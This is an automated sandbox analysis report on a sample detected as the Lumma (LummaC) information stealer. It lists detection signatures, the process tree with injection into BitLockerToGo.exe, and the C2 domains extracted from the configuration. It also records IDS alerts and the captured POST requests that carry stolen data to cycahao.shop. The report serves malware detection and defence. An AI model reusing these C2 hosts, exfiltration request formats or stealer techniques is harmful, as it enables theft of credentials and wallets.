Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6wFwugeLNG.exe

Overview

General Information

Sample name:6wFwugeLNG.exe
renamed because original name is a hash value
Original sample name:16b7635bd33367d455f26adc148dbfc3.exe
Analysis ID:1581196
MD5:16b7635bd33367d455f26adc148dbfc3
SHA1:0ae5aa47351d1732e9a851761ac91796364e5f53
SHA256:5f6e9e2cb25c557c1bc5ec4d56a4d3859a06d2d70dbccff887aa7cf115a91f98
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match
query blbeacon for getting browser version

Classification

  • System is w10x64
  • 6wFwugeLNG.exe (PID: 2792 cmdline: "C:\Users\user\Desktop\6wFwugeLNG.exe" MD5: 16B7635BD33367D455F26ADC148DBFC3)
    • reg.exe (PID: 4992 cmdline: reg query HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon /v version MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BitLockerToGo.exe (PID: 612 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["wrathful-jammy.cyou", "immureprech.biz", "awake-weaves.cyou", "sordid-snaked.cyou", "diffuculttan.xyz", "deafeninggeh.biz", "debonairnukk.xyz", "cycahao.shop", "effecterectz.xyz"], "Build id": "hRjzG3--VIKA"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
      • 0x0:$x1: 4d5a9000030000000
      00000000.00000002.2391539251.0000000009F30000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
      • 0x0:$x1: 4d5a9000030000000
      Process Memory Space: BitLockerToGo.exe PID: 612JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: BitLockerToGo.exe PID: 612JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: BitLockerToGo.exe PID: 612JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-27T08:20:32.744504+010020283713Unknown Traffic192.168.2.649754172.67.135.139443TCP
            2024-12-27T08:20:34.720753+010020283713Unknown Traffic192.168.2.649761172.67.135.139443TCP
            2024-12-27T08:20:37.107387+010020283713Unknown Traffic192.168.2.649767172.67.135.139443TCP
            2024-12-27T08:20:39.415938+010020283713Unknown Traffic192.168.2.649773172.67.135.139443TCP
            2024-12-27T08:20:41.713969+010020283713Unknown Traffic192.168.2.649779172.67.135.139443TCP
            2024-12-27T08:20:44.156009+010020283713Unknown Traffic192.168.2.649785172.67.135.139443TCP
            2024-12-27T08:20:46.581923+010020283713Unknown Traffic192.168.2.649791172.67.135.139443TCP
            2024-12-27T08:20:50.072641+010020283713Unknown Traffic192.168.2.649801172.67.135.139443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-27T08:20:33.446130+010020546531A Network Trojan was detected192.168.2.649754172.67.135.139443TCP
            2024-12-27T08:20:35.533896+010020546531A Network Trojan was detected192.168.2.649761172.67.135.139443TCP
            2024-12-27T08:20:50.846469+010020546531A Network Trojan was detected192.168.2.649801172.67.135.139443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-27T08:20:33.446130+010020498361A Network Trojan was detected192.168.2.649754172.67.135.139443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-27T08:20:35.533896+010020498121A Network Trojan was detected192.168.2.649761172.67.135.139443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-27T08:20:32.744504+010020582781Domain Observed Used for C2 Detected192.168.2.649754172.67.135.139443TCP
            2024-12-27T08:20:34.720753+010020582781Domain Observed Used for C2 Detected192.168.2.649761172.67.135.139443TCP
            2024-12-27T08:20:37.107387+010020582781Domain Observed Used for C2 Detected192.168.2.649767172.67.135.139443TCP
            2024-12-27T08:20:39.415938+010020582781Domain Observed Used for C2 Detected192.168.2.649773172.67.135.139443TCP
            2024-12-27T08:20:41.713969+010020582781Domain Observed Used for C2 Detected192.168.2.649779172.67.135.139443TCP
            2024-12-27T08:20:44.156009+010020582781Domain Observed Used for C2 Detected192.168.2.649785172.67.135.139443TCP
            2024-12-27T08:20:46.581923+010020582781Domain Observed Used for C2 Detected192.168.2.649791172.67.135.139443TCP
            2024-12-27T08:20:50.072641+010020582781Domain Observed Used for C2 Detected192.168.2.649801172.67.135.139443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-27T08:20:31.189614+010020582771Domain Observed Used for C2 Detected192.168.2.6567501.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-27T08:20:44.906387+010020480941Malware Command and Control Activity Detected192.168.2.649785172.67.135.139443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://kliptizq.shop/Avira URL Cloud: Label: malware
            Source: https://cycahao.shop/apiAvira URL Cloud: Label: malware
            Source: https://cycahao.shop/apivVaAvira URL Cloud: Label: malware
            Source: https://cycahao.shop/apibMMCEYAvira URL Cloud: Label: malware
            Source: https://cycahao.shop/Avira URL Cloud: Label: malware
            Source: https://kliptizq.shop/int_clp_ldr_sha.txt9:Avira URL Cloud: Label: malware
            Source: https://cycahao.shop/6Avira URL Cloud: Label: malware
            Source: cycahao.shopAvira URL Cloud: Label: malware
            Source: https://kliptizq.shop/int_clp_ldr_sha.txtz1Avira URL Cloud: Label: malware
            Source: https://cycahao.shop/apiVrAvira URL Cloud: Label: malware
            Source: 0.2.6wFwugeLNG.exe.9ee6000.1.unpackMalware Configuration Extractor: LummaC {"C2 url": ["wrathful-jammy.cyou", "immureprech.biz", "awake-weaves.cyou", "sordid-snaked.cyou", "diffuculttan.xyz", "deafeninggeh.biz", "debonairnukk.xyz", "cycahao.shop", "effecterectz.xyz"], "Build id": "hRjzG3--VIKA"}
            Source: 6wFwugeLNG.exeReversingLabs: Detection: 68%
            Source: 6wFwugeLNG.exeVirustotal: Detection: 43%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString decryptor: effecterectz.xyz
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString decryptor: immureprech.biz
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString decryptor: cycahao.shop
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString decryptor: hRjzG3--VIKA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00465890 CryptUnprotectData,5_2_00465890
            Source: 6wFwugeLNG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: unknownHTTPS traffic detected: 172.67.135.139:443 -> 192.168.2.6:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.135.139:443 -> 192.168.2.6:49761 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.135.139:443 -> 192.168.2.6:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.135.139:443 -> 192.168.2.6:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.135.139:443 -> 192.168.2.6:49779 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.135.139:443 -> 192.168.2.6:49785 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.135.139:443 -> 192.168.2.6:49791 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.135.139:443 -> 192.168.2.6:49801 version: TLS 1.2
            Source: 6wFwugeLNG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: BitLockerToGo.pdb source: 6wFwugeLNG.exe, 00000000.00000002.2391891785.000000000A100000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdbGCTL source: 6wFwugeLNG.exe, 00000000.00000002.2391891785.000000000A100000.00000004.00001000.00020000.00000000.sdmp
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h5_2_0048D3C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+10h]5_2_0048E3C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edx+7F059821h]5_2_0045C4C6
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+10h]5_2_00487500
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [eax+ebp*8], B430E561h5_2_00487500
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h5_2_0048D640
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax5_2_0047C67D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, ecx5_2_0045E6F2
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx]5_2_004897E0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+ebx*8], 67F3D776h5_2_004897E0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, eax5_2_00469804
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, word ptr [ecx]5_2_00469804
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax5_2_0047281D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax5_2_0048C820
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h5_2_0047A0D0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax5_2_004650DD
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [ebp-10h], D9DADBDCh5_2_004650DD
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push esi5_2_004760F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi+01h], 00000020h5_2_004760F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi], cl5_2_0047B0F9
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+05F9B979h]5_2_0046A0A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, edx5_2_004790BA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+0Dh]5_2_0045A950
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx-54h]5_2_00473960
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [eax]5_2_00467175
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax5_2_00467175
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, eax5_2_00455970
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebp, eax5_2_00455970
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]5_2_0046F100
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi], cl5_2_0047B12E
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax5_2_0048C930
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [ebp+00h]5_2_004529C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ecx], ax5_2_00478716
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+esi+02h]5_2_004781FB
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], F62C6D34h5_2_00489A60
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-1CF3D299h]5_2_0048C271
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax5_2_00477AAF
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]5_2_00479B50
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax5_2_0048CB20
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax5_2_0048CBC0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h5_2_00479BF0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h5_2_00489B90
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx-54h]5_2_00473C00
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ebx5_2_0048BCCB
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]5_2_004574D0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]5_2_004574D0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], cl5_2_0047B4EE
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+77CDE11Eh]5_2_00459490
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], cl5_2_0047B4A5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]5_2_004834B0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx]5_2_0048DD00
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0F117C20h]5_2_0047151B
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx-54h]5_2_00473DA0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]5_2_00486600
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea edx, dword ptr [ecx-80000000h]5_2_0047760D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax5_2_00466628
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+7Ah]5_2_00473E32
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-35h]5_2_00473E32
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [esp+30h]5_2_00473E32
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6A2D3EA3h5_2_00489EF0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A8F779E4h5_2_00489EF0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], A99F3325h5_2_00489EF0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+02h]5_2_00471E80
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h5_2_00464752
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+10h]5_2_0048BF6A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-4153C611h]5_2_0046E770
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ecx], ax5_2_00478716
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h5_2_0048D7C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edi], cx5_2_00477FD1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, dword ptr [ebp-1Ch]5_2_004767EF
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, edi5_2_004767EF
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], cl5_2_0046C78C

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2058278 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cycahao .shop in TLS SNI) : 192.168.2.6:49761 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2058278 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cycahao .shop in TLS SNI) : 192.168.2.6:49754 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2058277 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cycahao .shop) : 192.168.2.6:56750 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058278 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cycahao .shop in TLS SNI) : 192.168.2.6:49785 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2058278 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cycahao .shop in TLS SNI) : 192.168.2.6:49773 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2058278 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cycahao .shop in TLS SNI) : 192.168.2.6:49767 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2058278 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cycahao .shop in TLS SNI) : 192.168.2.6:49779 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2058278 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cycahao .shop in TLS SNI) : 192.168.2.6:49791 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2058278 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cycahao .shop in TLS SNI) : 192.168.2.6:49801 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49785 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49754 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49754 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49801 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49761 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49761 -> 172.67.135.139:443
            Source: Malware configuration extractorURLs: wrathful-jammy.cyou
            Source: Malware configuration extractorURLs: immureprech.biz
            Source: Malware configuration extractorURLs: awake-weaves.cyou
            Source: Malware configuration extractorURLs: sordid-snaked.cyou
            Source: Malware configuration extractorURLs: diffuculttan.xyz
            Source: Malware configuration extractorURLs: deafeninggeh.biz
            Source: Malware configuration extractorURLs: debonairnukk.xyz
            Source: Malware configuration extractorURLs: cycahao.shop
            Source: Malware configuration extractorURLs: effecterectz.xyz
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49761 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49754 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49785 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49773 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49767 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49779 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49791 -> 172.67.135.139:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49801 -> 172.67.135.139:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cycahao.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: cycahao.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J0Q9FYNC6JDNKH0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12840Host: cycahao.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L6ULRPNVME8B47K2ABUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15104Host: cycahao.shop
